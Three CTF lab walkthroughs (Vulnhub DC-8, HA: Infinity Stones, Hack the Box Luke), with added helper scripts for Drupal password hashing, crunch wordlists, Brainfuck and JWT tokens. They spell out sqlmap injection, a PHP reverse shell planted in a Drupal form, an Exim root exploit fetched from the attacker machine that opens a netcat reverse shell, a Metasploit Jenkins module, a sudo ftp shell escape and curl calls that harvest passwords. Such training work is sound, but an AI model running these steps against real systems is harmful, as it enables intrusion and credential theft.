DC8: Vulnhub Walkthrough


DC-8 is a VM by DCAU, a purposely built vulnerable lab for gaining experience in penetration testing. It is of intermediate level and is handy for brushing up your skills as a penetration tester. The ultimate goal of this challenge is to bypass two-factor authentication, get root and read a flag.
Level: Intermediate
These labs are available on the Vulnhub website; we downloaded the lab file from this link.
Penetration Testing Methodology
Network Scanning
netdiscover
nmap port scan
Enumeration
Browsing HTTP Service
SQL Injection for finding Credentials
Performing Directory Bruteforce
Exploiting
Editing Access given to user
Privilege Escalation
Exim
Capture the flag
Walkthrough
Network Scanning
The first step of an attack is to identify the target. To do so, we use netdiscover:
netdiscover
Next we run an aggressive nmap scan to gather information about the open ports and the services running on the target machine:
nmap -A 192.168.0.6
The scan shows port 80 open, hosting Apache httpd with Drupal 7, and port 22 open, running OpenSSH.
Enumeration
Next we enumerated the HTTP service in a web browser, which opened the DC-8 welcome page. The links on the left pass a numeric nid parameter in the URL, which looked worth probing.
We tested these links for SQL errors by appending a single quote (') to the nid parameter, which produced a database error message that we examined further.
After some poking around we were sure it was a genuine SQL error, so we ran sqlmap against the parameter. We set the risk to 3 and the level to 5; these options gave us the best results in the least time:
sqlmap -u 192.168.0.6/?nid=2 --dbs --batch --risk 3 --level 5
After working for some time sqlmap reported two databases on the target machine:
1. d7db
2. information_schema
Now that we know the application database is 'd7db', it is time to enumerate it further. We re-ran sqlmap with the --tables and --batch options to list the tables inside the database:
sqlmap -u 192.168.0.6/?nid=2 -D d7db --tables --batch --risk 3 --level 5
This returned a very large number of tables. Going through them with a keen eye, we found a table named 'users', which is definitely worth looking into.
Dumping that table with sqlmap gave us the following rows:
uid  name   init                 pass
1    admin  dc8blah@dc8blah.org  $S$D2tRcYRyqVFNSCONVYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2    john   john@blahsdfsfd.org  $S$DqupvJbxVmqjr6cYePnx2A8911Ln7lsuku/3if/oRVZJaz5mKC2vF

So we have two password hashes. The $S$ prefix marks them as Drupal 7 salted SHA-512 hashes, which John the Ripper handles directly. We saved them in a file named 'hash' and ran john against it. After working for some time, john cracked john's hash: the password is 'turtle'.
john hash
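To see what john is actually cracking here, the following Python script is an added example (not code from the original walkthrough and not Drupal's own code) that re-implements Drupal 7's password scheme: the $S$ prefix selects SHA-512, the next character encodes log2 of the iteration count, then come 8 salt characters, and the stored value is truncated to 55 characters. It parses the john hash copied from the dump above and generates and verifies hashes of its own; the fixed demo salt is an assumption made for reproducibility.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Drupal 7 password hashing (password.inc), re-implemented for illustration.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                 # Drupal keeps only the first 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30       # allowed range for the iteration exponent
ALGOS = {"$S$": "sha512", "$H$": "md5", "$P$": "md5"}   # $H$/$P$: phpass-style md5

# Hash for user 'john' as dumped from the d7db.users table above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A8911Ln7lsuku/3if/oRVZJaz5mKC2vF"


def _encode64(data: bytes) -> str:
    """Drupal's phpass-style base64: little-endian 6-bit groups, no padding."""
    out, i, count = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def parse_setting(stored: str) -> Tuple[str, int, str]:
    """Split the 12-character setting prefix into (algorithm, log2 iterations, salt)."""
    setting = stored[:12]
    algo = ALGOS.get(setting[:3])
    count_log2 = ITOA64.find(setting[3]) if len(setting) == 12 else -1
    salt = setting[4:12]
    if algo is None or not MIN_LOG2 <= count_log2 <= MAX_LOG2 or len(salt) != 8:
        raise ValueError("not a Drupal password hash")
    return algo, count_log2, salt


def _crypt(password: bytes, setting: str) -> str:
    """Drupal's _password_crypt(): hash(salt+pw), then 2**log2 rounds of hash(h+pw)."""
    if len(password) > 512:
        raise ValueError("password too long")
    algo, count_log2, salt = parse_setting(setting)
    h = hashlib.new(algo, salt.encode() + password).digest()
    for _ in range(1 << count_log2):
        h = hashlib.new(algo, h + password).digest()
    return (setting[:12] + _encode64(h))[:HASH_LENGTH]


def hash_password(password: str, count_log2: int = 15, salt: Optional[bytes] = None) -> str:
    """Produce a fresh $S$ hash; 6 random salt bytes become 8 encoded characters."""
    salt = os.urandom(6) if salt is None else salt
    setting = "$S$" + ITOA64[count_log2] + _encode64(salt)
    return _crypt(password.encode(), setting)


def check_password(password: str, stored: str) -> bool:
    """Drupal's user_check_password(), including the U$ (migrated md5) case."""
    pw = password.encode()
    if stored.startswith("U$"):
        stored = stored[1:]
        pw = hashlib.md5(pw).hexdigest().encode()
    try:
        return hmac.compare_digest(_crypt(pw, stored), stored)
    except ValueError:
        return False


def describe(stored: str) -> Tuple[str, int, str]:
    """Return (algorithm, iteration count, salt) so the cracking cost is visible."""
    algo, count_log2, salt = parse_setting(stored)
    return algo, 1 << count_log2, salt


if __name__ == "__main__":
    print("john's hash:", describe(JOHN_HASH))
    demo = hash_password("turtle", salt=b"\x01\x02\x03\x04\x05\x06")  # fixed salt: assumption
    print(demo, check_password("turtle", demo), check_password("Turtle", demo))
```

With Drupal's default exponent of 15, each guess costs 2^15 + 1 SHA-512 computations, which is why john needs a while even for a short wordlist hit like 'turtle'; john's drupal7 format implements exactly this loop.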
This credential might be useful somewhere further down the road. For now, let's run a directory brute-force with dirb. It found a page named 'user', Drupal's login page:
dirb http://192.168.0.6
Opening the page in our browser, we saw that it asks for login credentials. We had obtained a username and password through the SQL injection and john, so we logged in with:
Username: john
Password: turtle
After logging in it was time to look around and try different options. While enumerating we stumbled upon Form settings. Let's take a closer look at it.

Here we had an option to change the text format, and one of the choices was PHP code. Selecting it revealed the PHP code behind the page. We edited it to include our PHP reverse shell, so that a shell is spawned on the target machine when the form is submitted.
With the PHP code edited, we started a netcat listener to receive the shell that will be generated when our reverse shell script executes:
nc -lvp 1234
To submit the form with our reverse shell in place, we have to fill in the mandatory fields. The values can be anything as long as they fit the format each field expects.
After filling in that information we clicked Submit. A few seconds later we got a shell from the target machine as user 'www-data'. This is not a proper TTY, so we upgraded it with the Python one-liner below.
With a proper shell, it was time to escalate privileges. We ran find to list files with the SUID bit set and found the exim4 binary among them. To search for an exploit we needed its version, which turned out to be 4.89.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
www-data@dc-8:/$ exim --version | head -1

We searched the web for an exploit against Exim 4.89 and found a local privilege escalation exploit on Exploit-DB, raptor_exim_wiz, which abuses the setuid exim binary (the underlying bug is CVE-2019-10149, affecting Exim 4.87 through 4.91). We examined it carefully.
First we moved into /tmp on the target, since we need to transfer a file and /tmp is writable. On our attacker machine (Kali Linux) we downloaded the exploit, saved it as raptor_exim_wiz.sh and edited it to set our IP address and the port on which we will catch the netcat session. We then served the file from Kali with a simple HTTP server on port 8000 and fetched it on the target with wget. After transferring the script we made it executable:
www-data@dc-8:/tmp$ wget http://192.168.0.8:8000/raptor_exim_wiz.sh
www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh
With the script executable, we started a listener to catch the shell it will generate, then ran the script with the netcat option as shown below. The script spawned a reverse shell to our attacker machine on port 4444.
nc -lvp 4444
www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat
We got a shell on the target machine, and whoami gave the satisfying answer 'root'. We moved into the root directory with cd and found the flag there.
whoami
cd /root
ls
cat flag.txt

HA: Infinity Stones Walkthrough


Today we are going to solve our CTF challenge "HA: Infinity Stones". We developed this lab for online penetration testing practice. Solving it is not that tough if you have basic knowledge of penetration testing. Let's start and learn how to breach it.
Level: Intermediate
Task: Find 6 Flags on the victim’s machine.

Penetration Methodology

Scanning
Netdiscover
Nmap

Enumeration
Directory Scanning using DIRB
Exploitation
Privilege Escalation
Getting SUID File

Capturing the flag

Walkthrough

First of all we identify our target with netdiscover:
netdiscover
Having identified the target, we move on to the second step and scan it with nmap:
nmap -A 192.168.0.4
The scan shows ports 22, 80, 443 and 8080 open, running SSH, HTTP, HTTPS and HTTP respectively. Since port 80 is open, we opened the target IP address in our browser:
It showed a simple webpage. Port 8080 is also open according to the nmap scan, so we opened the target on port 8080 as well and found a login page:
Since we have no login credentials yet, we ran dirb to find directories. Its results contained two interesting ones, /img and /wifi:
We opened /img first and found a single file there, space.jpg.
The image shows the Tesseract and nothing else:
But the Space Stone was inside the Tesseract, so we checked the image for hidden metadata with exiftool:
exiftool space.jpg
Our hunch was correct: the metadata contained our first flag, the Space Stone. Our infinity gauntlet is still missing five more stones (flags), so let's find them.
The target also has port 443 open, so there is a site on HTTPS. Opening the target IP on port 443 produces a warning that something is wrong with the SSL certificate:
Click the lock icon and open the certificate details; the second stone, the Mind Stone, is hidden in the certificate. Four more stones to collect before there is perfect balance.
Recall that dirb also found /wifi alongside /img, so we traversed that next.
It held two files, pwd.txt and reality.cap. We downloaded pwd.txt first:
wget http://192.168.0.4/wifi/pwd.txt
Once downloaded, we read it with cat. It says: "Your Password is thanos daughter name "gam" (note it's all lower case) plus the following I enforced new requirement on you...12 characters
One uppercase character
Two numbers
Two lowercase
The year of the first avengers movie came out in theaters”

Now that we know the password format, we used crunch to generate a wordlist of every possible combination: the literal gam, one uppercase letter (,), two digits (%%), two lowercase letters (@@) and the literal 2012, the year the first Avengers film came out:
crunch 12 12 -t gam,%%@@2012 -o dict.txt
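The following Python script is an added example (not part of the original lab and not crunch's code) that expands a crunch-style -t pattern in pure Python, so you can size the keyspace before writing a multi-megabyte file: @ stands for a lowercase letter, a comma for an uppercase letter, % for a digit and ^ for a symbol; every other character is literal. The policy check encodes the rules from pwd.txt. The candidate order is this script's own, not necessarily crunch's, and the symbol set is an assumption.

```python
import itertools
import string
from typing import Iterator, List

# crunch -t placeholder classes; the symbol set is an assumption about crunch's default.
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}

# The pattern used on the page: gam + 1 uppercase + 2 digits + 2 lowercase + 2012.
PATTERN = "gam,%%@@2012"


def charsets(pattern: str) -> List[str]:
    """One character set per position: a class for placeholders, the literal otherwise."""
    return [CLASSES.get(ch, ch) for ch in pattern]


def count_candidates(pattern: str) -> int:
    """Size of the keyspace, computed without generating anything."""
    total = 1
    for cs in charsets(pattern):
        total *= len(cs)
    return total


def expand(pattern: str) -> Iterator[str]:
    """Yield every candidate; the leftmost placeholder varies slowest."""
    for combo in itertools.product(*charsets(pattern)):
        yield "".join(combo)


def first_n(pattern: str, n: int) -> List[str]:
    """The first n candidates, handy for eyeballing the output before a full run."""
    return list(itertools.islice(expand(pattern), n))


def policy_ok(candidate: str) -> bool:
    """The rules from pwd.txt: 12 chars, 'gam', 1 upper, 2 digits, 2 lower, then 2012."""
    if len(candidate) != 12 or not candidate.startswith("gam") or not candidate.endswith("2012"):
        return False
    mid = candidate[3:8]
    return mid[0].isupper() and mid[1:3].isdigit() and mid[3:5].islower()


def write_wordlist(pattern: str, path: str) -> int:
    """Write all candidates to `path`, one per line; returns how many were written."""
    n = 0
    with open(path, "w") as fh:
        for cand in expand(pattern):
            fh.write(cand + "\n")
            n += 1
    return n


if __name__ == "__main__":
    print(PATTERN, "->", count_candidates(PATTERN), "candidates")
    for cand in first_n(PATTERN, 3):
        print(cand)
```

For this pattern the keyspace is 26 × 100 × 676 = 1,757,600 candidates, small enough that aircrack-ng will finish in minutes; knowing the count up front tells you whether the hint made the problem tractable or whether you need more constraints.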
The other file, reality.cap, turned out to contain captured wifi packets. We ran aircrack-ng against it with the wordlist crunch created, and voila, it recovered the wifi key:

We used the wifi key as a directory name on the web server and found realitystone.txt, which led us to the Reality Stone. Three stones down, three to go.
For the next stone we returned to the target on port 443; the page has a link at the top right. Clicking it redirects to an Avengers quiz, together with a hint about binary:

Solving the quiz gave the following answers with their binary values:
No.  Question                                                         Answer  Binary
1    In the beginning, there are 3 infinity stones on earth.          False   0
2    At the end, there are two survivors on Titan.                    True    1
3    Thanos already had the power stone when he first appeared.       True    1
4    Tesseract contains the reality stone.                            False   0
5    The dwarf on Nidavellir is played by Peter Dinklage.             True    1
6    Red Skull is the guardian of the space stone.                    False   0
7    Thor's new hammer is called stormbuster.                         False   0
8    Rocket is the only Guardian of the Galaxy to survive the snap.   True    1


Reading the binary values in order gives the string 01101001. Using it as a directory name in the URL, we found a hints.txt, which contained a Brainfuck program.
Brainfuck is an esoteric programming language rather than a cipher, so "decoding" the hint means running it: the program's output was admin:avengers. These are very likely the login credentials for the page on port 8080.
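A Brainfuck interpreter is a few dozen lines, and writing one avoids pasting CTF hints into random online decoders. The script below is an added example for this walkthrough (not the lab's hints.txt, which is not reproduced here, and not Hacking Articles' code). The programs it runs are constructed: the classic Hello World program from the Brainfuck literature, and a trivial program generated from the string admin:avengers.

```python
from typing import Dict

# Classic Brainfuck "Hello World!" program, used here as a constructed test input.
HELLO = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++.."
         "+++.>>.<-.<.+++.------.--------.>>+.>++.")


def _bracket_map(program: str) -> Dict[int, int]:
    """Pair every '[' with its ']' so jumps are O(1); raises on unbalanced brackets."""
    stack, pairs = [], {}
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at {pos}")
            start = stack.pop()
            pairs[start], pairs[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at {stack[-1]}")
    return pairs


def bf_run(program: str, stdin: bytes = b"", tape_size: int = 30000,
           max_steps: int = 10_000_000) -> str:
    """Execute a Brainfuck program and return its output (8-bit wrapping cells)."""
    jumps = _bracket_map(program)
    tape = bytearray(tape_size)
    ptr = pc = inp = steps = 0
    out = bytearray()
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (non-terminating program?)")
        op = program[pc]
        if op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":                       # EOF reads as 0
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < tape_size:
            raise RuntimeError(f"tape pointer out of range at pc={pc}")
        pc += 1                               # any other character is a comment
    return out.decode("latin-1")


def bf_encode(text: str) -> str:
    """Build a naive program printing `text`: clear the cell with [-], count up, print."""
    return "".join("[-]" + "+" * ord(ch) + "." for ch in text)


if __name__ == "__main__":
    print(bf_run(HELLO), end="")
    print(bf_run(bf_encode("admin:avengers")))
```

The step limit matters when running untrusted programs from a challenge: a hint that loops forever should time out rather than hang your shell.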
As deduced, we logged in with those credentials and were welcomed by the following page:
The application is Jenkins, and Metasploit has an effective exploit for an authenticated Jenkins script console. So open Metasploit in Kali and run the following commands:
use exploit/multi/http/jenkins_script_console
set target 1
set rhosts 192.168.0.4
set username admin
set password avengers
set targeturi /
exploit
Once the exploit runs, you get a meterpreter session. Dropping to a shell with the plain "shell" command gives an improper shell; upgrade it with:
python3 -c 'import pty;pty.spawn("/bin/bash")'
With a proper shell, we looked for files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
The command produced a list that we went through one by one. The one that stood out was /opt/script, and that is exactly where our next stone, the Time Stone, was:
Having found the fourth stone in /opt/script, we decided to explore /opt a bit more:
cd /opt
ls
Listing /opt revealed morag.kdbx, which is interesting for two reasons: Morag is a planet in the Avengers series, and the .kdbx extension marks a KeePass password database.
Opening it presented the following dialogue box:
Since we did not know the master password, we extracted a crackable hash from the database with a Python script (John the Ripper jumbo ships keepass2john for the same purpose) and cracked it with John the Ripper:
python keepass.py morag.kdbx > hash
john hash
As the image shows, the master password is princesa. Opening the database with it, we found one entry under the Flags tab: the Power Stone, our fifth and second-to-last stone:
Another entry, just below Flags, is cred. It contained a base64 string:
We decoded the string with base64:
echo "bW9yYWc6eW9uZHU=" | base64 -d
It decoded to plain text, morag:yondu:
We have found five stones so far using every port except SSH, and the decoded string looks like a username and password. So we tried logging in over SSH with it:
ssh morag@192.168.0.4
When asked for the password, type 'yondu' and you are logged in:
After logging in over SSH, we ran sudo -l to see which commands this user may run through sudo. It listed /usr/bin/ftp, runnable without a password. ftp lets you run a shell command with !, so launching it via sudo and escaping to a shell gives us root, from where we read the final flag:
sudo -l
sudo ftp
!/bin/bash
cd /root
ls
cat final.txt

And so, we have found all the six stones aka flags and with just a snap there can be perfect balance in the universe.

Hack the Box Luke Walkthrough


Hello everyone, and welcome to yet another CTF challenge from Hack the Box, 'Luke', available online for those who want to improve their penetration testing and black-box testing skills. Luke is a retired vulnerable lab presented by Hack the Box for online penetration testing practice suited to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
Scanning
    Nmap
Enumeration
    Logging in FTP as anonymous
    Browsing HTTP service
    Directory Scanning using Dirsearch
Exploitation
    Extracting Authentication token using curl   
    Extracting User information using curl
    Extracting Password using curl
Privilege Escalation
    Logging in Ajenti Panel
Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.
nmap -A 10.10.10.137

The result shows five open ports on the VM: 21, 22, 80, 3000 and 8000.
FTP allows anonymous login, so we checked it:
ftp 10.10.10.137
ftp> ls
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt

Through the anonymous FTP login we found a file, for_Chihiro.txt, whose contents suggest that Chihiro and Derry are usernames.
cat for_Chihiro.txt

The nmap results show an HTTP service on port 80, so we browsed to the target IP and found a simple HTML page.

We also ran a directory brute-force to enumerate the machine further. It found several directories and files, including config.php and management:
./dirsearch.py -u http://10.10.10.137 -e php -x 400,403,404

We enumerated all of them. Among which config.php gave us some database credentials as shown in the image below.

We tried those credentials on 10.10.10.137/management, but it returned an unauthorized error. We will come back to it later.

Back to the nmap scan: a Node.js service is running on port 3000. Browsing to the IP address on port 3000, we got a message saying that an auth token is not supplied.

We ran a directory brute-force on port 3000 as well, which found pages named /login and /users:
./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400,403,404

After a bit of research, we found that /login issues a JWT auth token in response to a JSON POST containing a username and password, which we can send with curl.
The tricky part is that the username is admin, not root as we first guessed.
So we ran curl with admin as the username and the password from config.php:
curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login
This gave us the auth token.

Passing the token in an Authorization: Bearer header, we enumerated the users through /users, which returned the user information shown below:
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

Querying each user with the same token gave us their passwords; for Derry:
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users/Derry
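The token the API hands out is a JWT: two base64url-encoded JSON parts (header and claims) followed by an HMAC-SHA256 signature over them. The script below is an added example (not the API's code and not part of the original write-up) that decodes the token shown above without verifying it, so you can read the username and the iat/exp validity window before reusing it, and that mints and verifies HS256 tokens of its own. The signing key it uses is made up; the server's real secret is unknown, so verifying the page's token against that key is expected to fail.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Any, Dict, Optional, Tuple

# Token returned by /login on the page (copied from the curl commands above).
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9."
              "h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310")


def _b64url_decode(part: str) -> bytes:
    """JWT parts drop the '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]:
    """Split a JWT into (header, claims, signature). Trusts nothing: for inspection only."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(claims_b64)),
            _b64url_decode(sig_b64))


def sign_hs256(claims: Dict[str, Any], key: bytes) -> str:
    """Mint an HS256 token: base64url(header).base64url(claims).base64url(HMAC)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_hs256(token: str, key: bytes, now: Optional[float] = None) -> Optional[Dict[str, Any]]:
    """Return the claims if signature and expiry check out, else None.

    The algorithm is pinned to HS256 before anything else, so a token claiming
    alg 'none' or a public-key algorithm is rejected instead of being trusted.
    """
    try:
        header, claims, sig = decode_unverified(token)
    except ValueError:          # wrong part count, bad base64, bad JSON
        return None
    if header.get("alg") != "HS256":
        return None
    signing_input = token.rsplit(".", 1)[0].encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        return None
    return claims


def validity_window(token: str) -> Tuple[int, int, int]:
    """(iat, exp, lifetime in seconds) taken from the unverified claims."""
    _, claims, _ = decode_unverified(token)
    return claims["iat"], claims["exp"], claims["exp"] - claims["iat"]


if __name__ == "__main__":
    header, claims, sig = decode_unverified(PAGE_TOKEN)
    print(header, claims, len(sig), "byte signature")
    print("lifetime:", validity_window(PAGE_TOKEN)[2], "seconds")
    key = b"demo-secret"    # made-up key: assumption, the server's real secret is unknown
    mine = sign_hs256({"username": "admin", "iat": 1000, "exp": 2000}, key)
    print(verify_hs256(mine, key, now=1500), verify_hs256(PAGE_TOKEN, key))
```

The claims show the token is valid for exactly 24 hours from issue, so a captured token is reusable for a day without re-authenticating; that window, and whether the server pins the algorithm the way verify_hs256 does, are the two things worth checking on any JWT-protected API you meet.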

With Derry's credentials we logged in to the management page successfully:
Username: Derry
Password: rZ86wwLvx7jUxtch

After logging in we found files named config.json, config.php and login.php. We went through all of them, and config.json seemed the most interesting.


config.json contained information about the 'ajenti' service running on port 8000, including a password.


We browsed to the IP address on port 8000, which presented another login form. The following credentials got us into the Ajenti panel, as shown in the image below:
Username: root
Password: KpMasng655EtTy9Z

After enumerating a bit, we saw an option to open a terminal. In it we checked the user and group details with the id command: it is a root shell. From there we read the user and root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.